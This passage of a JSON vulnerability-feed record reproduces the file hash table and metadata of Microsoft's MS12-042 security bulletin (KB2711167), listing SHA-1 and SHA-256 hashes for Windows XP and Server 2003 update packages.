class=\"sbody-td\">E4FB7F3BE1E921A9760DC97B836186705E10CC8FEB2ACD4E821BBE1F2C3B601D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-ia64-fra.exe</td><td class=\"sbody-td\">4875C5E515007EA7F291060C341F6D20E25BFF30</td><td class=\"sbody-td\">59DFEAE7A11A8797CD44F126BA563D1CEC284CA86E3C34DEBD2F25321C5F9576</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-ia64-jpn.exe</td><td class=\"sbody-td\">7BED3C8C676E97C2EA9BDE2B04192DF2BB630CDB</td><td class=\"sbody-td\">9FD4BC4A434A32FFB6E8BE75135939F3495729C10A2A648E81015C0D008D5B8F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-ia64-deu.exe</td><td class=\"sbody-td\">89797041F4BB9FF03D91E85DEB2A00C1698C95BD</td><td class=\"sbody-td\">3CBA0162F116C6C7E5D4C582A5356D6E6E4A90411B5704BC4BF5600ACD968C78</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-enu.exe</td><td class=\"sbody-td\">A02ADEE1F79D47CEB8CD6D466914A871E51620D3</td><td class=\"sbody-td\">AEEFF030B9433C6A042EF1DE946097833A17792DA5CF81FEF4105B593E8CF9F2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-jpn.exe</td><td class=\"sbody-td\">6DF69ADABF9F65707B3647E75A91C3102CD9FD13</td><td class=\"sbody-td\">541A8A737EAFC63EB5E08472A5E5988793C5F66EC5E5A66FBD7FD71157B2880D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-enu.exe</td><td class=\"sbody-td\">7C9AFB9BD7C7CE2771AC76918B67AD804EE0D6D9</td><td class=\"sbody-td\">A6228A642367A343C60F003DFF7823FB8F3E76E04D7DD522CD2B240D7AC40B09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-csy.exe</td><td class=\"sbody-td\">131211D06F134B14DAB817D4DE537EBBD0D3688D</td><td class=\"sbody-td\">63F201960E7D44F33A817668E09957EDC2F1AEDB675AA334239F4532B90E8E65</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-jpn.exe</td><td class=\"sbody-td\">D5E2F73F67B85189F46825BA5AF073B76F98C3F2</td><td class=\"sbody-td\">2217C672CA0361CD68520313FFA94C2D360DDEC309C502CF1EC6815EBE687183</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-fra.exe</td><td class=\"sbody-td\">3DD57A602F354288E5678081BBCA6C33457F299E</td><td class=\"sbody-td\">AF64379E6988C862C2DF218CAC7AE3EE405F794C491B83C22EEE07423C75521D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-nld.exe</td><td class=\"sbody-td\">FF58FB52740A8598EB9C097417C07CA2650954CF</td><td class=\"sbody-td\">52C5ABC90AC0E859FE6B5F690DE7CA08334B3BBEBAA9D1763AFD5888C51A84CD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-hun.exe</td><td class=\"sbody-td\">FC3C5C7C9824656FC184BB0C57003C4AF661E584</td><td class=\"sbody-td\">99EEC193469F4EA1D48703A0C604147433A49937F37D9F3B56C69AD47A23B940</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-ptb.exe</td><td class=\"sbody-td\">2BFE264152B3E10DEB3E9AD9C03C3403DFF4B0CE</td><td class=\"sbody-td\">BE6F0539B3C009B75CD4493D8765514214ABBA99CB0BFB37A1983DC5AC7A633B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-deu.exe</td><td class=\"sbody-td\">9E68D6540A7B811BFE17FC39A82975E358AF43AF</td><td class=\"sbody-td\">27AC1F4DF50D4C5E3A8487C12FD923CAA95F476FBB06B933671777099AF91C8D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-plk.exe</td><td class=\"sbody-td\">EC83EA2E7850EAA39F088A280DD7F6369C7E59B0</td><td class=\"sbody-td\">CB0C441B735DE56BE1A6E08B79BD537A6E2905C293A3EBFA3D899A492C936A71</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-ptg.exe</td><td class=\"sbody-td\">E2EED4951CB307E8FCDD8787845A04687107A501</td><td class=\"sbody-td\">79DC5142B03EE1FCC6C3BFED04D61EAD40EE03EAE64B4631C558B5FA66985DE8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-ita.exe</td><td class=\"sbody-td\">D9A5A88D2BA986A298C7D5DA4787D099B3448477</td><td class=\"sbody-td\">EC9B4378FB1E4B4FE2B22EC5C168DC304D4F42BE72D440DAB54CAB2DD53154E5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-rus.exe</td><td class=\"sbody-td\">465F2CAAA66424FE01C7AAAA3ECB012B56FEE0B5</td><td class=\"sbody-td\">E83B0CBDB46644746F2764E2CA5E9C2080273AC159E7B3B6A15F6AD9C4AE5BCC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-esn.exe</td><td class=\"sbody-td\">9D3CAFC7F1EA4C9EBFA82793DA8ACC38E4D36D7C</td><td class=\"sbody-td\">B03CFE6A90CBF0A760C51154EFB5A738D1CCF4B566190D02191987497C3900B9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-sve.exe</td><td class=\"sbody-td\">497B25502C1A4FC3E23163F03F6A7455A8B35FEB</td><td class=\"sbody-td\">DE0D6F1EF04D288B3BF74921BE19FFB947F7D8977EC66D410CF803618B6FC84F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-trk.exe</td><td class=\"sbody-td\">1A2C6633070C159B568F2F5DAC1C26828020A51F</td><td class=\"sbody-td\">B394758A5E6D1733FD7F3E81586E9FD07EA4813501B1111791B4205516624E20</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-chs.exe</td><td class=\"sbody-td\">6775120045327A36BC22666ED8E6567CD7FB1695</td><td class=\"sbody-td\">5FD5CC2A04D350A1204DD1D467F4D6C8D54BC509BA2BEF0B555714170CF4D4C3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-kor.exe</td><td class=\"sbody-td\">15A38C93DB28B34A96D76A7B2CBF0E0F5DC1F7CE</td><td class=\"sbody-td\">CFBC5F3B0C9778792282CD21B08998961BD4F006DFAFD54F008AB096CDDC598B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-cht.exe</td><td class=\"sbody-td\">BDBE324A32268A963A44EA7A2B38E112F338F119</td><td class=\"sbody-td\">060831AF14E166D4571512DB0A9F7F81E79AB8850E0FB5F8F9005463A6B20898</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-enu.exe</td><td class=\"sbody-td\">0AF63C8C4648C6A7CB7314A18AA9A07C5881F394</td><td class=\"sbody-td\">AEACF0B0742517CA99D0326486390AD2441262F8F96288FD0881C30F04940F58</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-csy.exe</td><td class=\"sbody-td\">E15D69799C600D68E94C0C9C7A549061A8B6C0A2</td><td class=\"sbody-td\">A0348ED4740526758D7041AF57D295A061ADFF103A25947C992B3C941775F941</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-dan.exe</td><td class=\"sbody-td\">0E7B7344DAB25F7A1376B37093117BF4D159FA0E</td><td class=\"sbody-td\">F812C5626F2A10625E1BC78D3A60177B79EB0E36DBC1EE02E8DF297D5AC1E12E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-esn.exe</td><td class=\"sbody-td\">1C8EF56B4C3748A51224765BA469F03DAA03382A</td><td class=\"sbody-td\">C799BF7B990C2ACDC789AEE249BCFAE855A0B4414C417D269CCFA1A305ECD6F2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-fin.exe</td><td class=\"sbody-td\">C277D46E6182D88700614F6C808619610174A3C6</td><td class=\"sbody-td\">ACA788E64208B4FFE6DC52F0D2B7A6467CBC313E1E5ED453DFDF6ACF16B24A2B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-heb.exe</td><td class=\"sbody-td\">8AD1877F16DF4F423BB70D51E92BD2F534EE3993</td><td class=\"sbody-td\">77D71B00FFBAF5A87C1A82CB9B1BE24838A9E6C43FCB406B99C047718F2326AD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-hun.exe</td><td class=\"sbody-td\">D971C5E6DF31FD5107A6368D3A15694F661FB44C</td><td class=\"sbody-td\">CA88CEE19F60BC5D7EFBABE4DC3CD0663112DAD753AC72B2AF266A21318AA7D0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-nld.exe</td><td class=\"sbody-td\">E383C9CB89CE1A1E57C854E30AAE671ACD497A1F</td><td class=\"sbody-td\">06FDE1A1E74307F61C49BF926AEF4EAFBF616F6E81BAC82188CC8E3306D90E0D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-plk.exe</td><td class=\"sbody-td\">4F169D66D329D023B03B6520CC1B5AA59E47F0C2</td><td class=\"sbody-td\">B1D7380346A3F2566E0168AE78DBFA48E0BD113771595F7979BBFE1286211D91</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-nor.exe</td><td class=\"sbody-td\">2349CD62213D8A36DC9DE83672F4C055FA42565A</td><td class=\"sbody-td\">002460F7DF5ECDCF110CBC97856B66927569AE3C5ECDE1C63E154FC9BE462A0D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-sve.exe</td><td class=\"sbody-td\">22FA93A675EB556F6CC73596C16FF47CB7066BC2</td><td class=\"sbody-td\">8DBB1EA72EEFB65715B0E1699A53B05B056F313F0E8368DD4C28FC8C7E90C228</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-ptb.exe</td><td class=\"sbody-td\">558604535319FCB904AF3A48ED8259692F7E7D04</td><td class=\"sbody-td\">573F20828BA3EF8890F3B3540195A4D78F795FD0CF252A28E66AD4E4B1E06FEF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-rus.exe</td><td class=\"sbody-td\">275C65277778A495D6E2DA5AA3DD0D5711A29FC8</td><td class=\"sbody-td\">227032A351DAD5C35258AF18C1ED0A34164876DD403A7C554D287DD62B4236C6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-deu.exe</td><td class=\"sbody-td\">CC7DB3D29DDD1CFCEEDA36E0BD87FD10E69DBB80</td><td class=\"sbody-td\">3C620CAA7C1273911BDA3278889791C441AE5B21076FC84552ECE94011B49C5D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-ara.exe</td><td class=\"sbody-td\">DD2FE4BF24F017E8FCCE183395329D648C886B65</td><td class=\"sbody-td\">7BBCD4359FBCDA3DC18EBEBFE15BAC4E30B02EF41A65ACE2A72364656D108758</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-cht.exe</td><td class=\"sbody-td\">2AA39FBAEAB5734E87869A188A9395B46A2A8CEC</td><td class=\"sbody-td\">2B8DD0EA187089BA8A34A1400F1B697CFF124CB5277EE6B0F848C72FFFBEDBAE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-ell.exe</td><td class=\"sbody-td\">970533FCAD502413B06672122417AACA2C6E0A17</td><td class=\"sbody-td\">0CE3D5A586C79CCB60F8A4DCC6FE772E27693FD294AAD2688A783016F333349B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-ita.exe</td><td class=\"sbody-td\">90EAF07FC36A024FDC8D77501F68256980481C1F</td><td class=\"sbody-td\">DF42D439DDD94CEF9AC2A9A68C6370E5D56437E5A9A7315AE9C893F13A3B3F75</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-kor.exe</td><td class=\"sbody-td\">2ACD872CED018A9115A9EE53B88B58A4300B6953</td><td class=\"sbody-td\">D5F5DB778C45631D921191A233F2C4B0B8B62AF812749FB8CAECAC894C2783CB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-trk.exe</td><td class=\"sbody-td\">82BE4852E57DA5447DB884E7B9C5A85F72A0078F</td><td class=\"sbody-td\">00F014F82ED71AA2B45DC146C06A35A080EAEB2571FF80DEB05122E046F845BB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-chs.exe</td><td class=\"sbody-td\">B9B33853EFCFB974185C7C8B21684C54FF91754D</td><td class=\"sbody-td\">4BAE0D7D74E480AFC0111E0DAA5AB7C2D398D66BC422FD5CFA1E97BBD60BB84A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-fra.exe</td><td class=\"sbody-td\">E230050257FA27F6BC2393D9A6834FF6C0A6F0C8</td><td class=\"sbody-td\">D28827BDFC03A4C6EAFF69E6F458FFD376449B4078D35426A69DA23AC2A6E0E9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-jpn.exe</td><td class=\"sbody-td\">B357504496B0AFE49A188752FF35D9BD00A4FF44</td><td class=\"sbody-td\">337962CB7C9D35892C8494A22E1750F9327AB5EF49D5C72E37C7E1B0C5408BCB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-ptg.exe</td><td class=\"sbody-td\">AB6F208C535169D6D25681B1DCCFEDF4BFDF50EE</td><td class=\"sbody-td\">C1A76CA9067D1916DD7C9685C9F6F4BDE3D37E49CF66AE3228754895DC0BBCE1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-fra.exe</td><td class=\"sbody-td\">400783F00EE11E90648F6F7590D16470A9854EC2</td><td class=\"sbody-td\">CE461789BFDA54D546963375F55F0F2FFF06D1E952E561B6FB9597045D67E188</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-deu.exe</td><td class=\"sbody-td\">924B3342530FD7B33F585E503E945C775E41C2CE</td><td class=\"sbody-td\">2F357DDB27B3F0F19C10D28FE757E5C2F339F10AD10F47579307D657F22CDBBC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-ptb.exe</td><td class=\"sbody-td\">FD0E560002D26B75C38EC7CF8EF6F45AE0086385</td><td class=\"sbody-td\">39D9B76F40AAFB93CAAAF235F8017B73EA014519658304DD43F8BEA37BB42846</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-esn.exe</td><td class=\"sbody-td\">A266EEF4F137A2A675F8406BD3A006D9511E3C0A</td><td class=\"sbody-td\">2511698E1329BC9E2B03E667110666387C944CE584DD30D7F1A3FB8B0FE2B2EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-chs.exe</td><td class=\"sbody-td\">8B6AC88F8831206FA4640DE1FFA7C088FF1C3CBF</td><td class=\"sbody-td\">A88F325B5FE733D3A59FBC8A51865593FB3A3081FBD631DD899FEDC08ECB55AF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-kor.exe</td><td class=\"sbody-td\">78350EBD34DB41D0C97202D87B72C781D9CFBA7E</td><td class=\"sbody-td\">73F5E1518249AB5490E62776A040C3639D9101CEDDFB2086DD124E3C32F9F279</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-rus.exe</td><td class=\"sbody-td\">695947CE0B536F230707EA71DD5F61B2F6D84E42</td><td class=\"sbody-td\">CD1473F96E4A43FD1BB1B0D0E67C5A38E62DD3239C892A3E7D59EAE034FF2A4B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-ita.exe</td><td class=\"sbody-td\">20F93FEAF185589E18997518CFE0291EE24EB08B</td><td class=\"sbody-td\">EA54EC6E7FB63446EE5201617A73CBEB29CA6DD08735BC555F20CDF3C70BC37F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-cht.exe</td><td class=\"sbody-td\">A9A0E216540ACF40B36F7AD8913E60E453A71F5C</td><td class=\"sbody-td\">4E09195A2CD7E6BC4387104D3F0D9581D185CC656070F423C17A19E6CD611E93</td></tr></table></div></div></body></html>", "edition": 2, "modified": "2012-06-12T17:07:37", "id": "KB2711167", "href": "https://support.microsoft.com/en-us/help/2711167/", "published": "2012-06-12T00:00:00", "title": "MS12-042: Vulnerabilities in Windows Kernel could allow elevation of privilege: June 12, 2012", "type": "mskb", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}]}
